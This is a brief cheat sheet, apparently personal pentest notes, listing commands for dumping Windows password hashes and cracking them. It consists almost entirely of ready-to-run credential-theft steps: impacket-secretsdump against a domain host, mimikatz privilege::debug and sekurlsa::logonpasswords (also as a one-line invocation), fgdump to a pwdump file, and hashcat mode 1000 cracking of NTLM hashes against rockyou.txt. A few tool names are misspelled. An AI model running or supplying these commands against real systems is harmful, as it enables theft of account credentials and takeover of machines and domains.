*Using Impacket-secretdump

impacket-secretdump “<domain>/<user>:<password>@<ip>”

*Using mimikatz

1. Transfer all 3 mimikatz file to run mimikatz.exe from /usr/share/windows-resources/mimikatz/ mimikatz.exe

2. Give privilege access privilege::debug

3. sekurlsa::logonpasswords

retrieve password hash

• If somehow mimikatz don’t work.. try in single command ./mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit”

*Using fsdump

• transfer from usr/share/windows-resources/binaries/fgdump/fgdump.exe
• fgdump.exe
• 127.0.0.1.pwdump will have all hashes

Crack

• hashcat -m 1000 hash rockyou.txt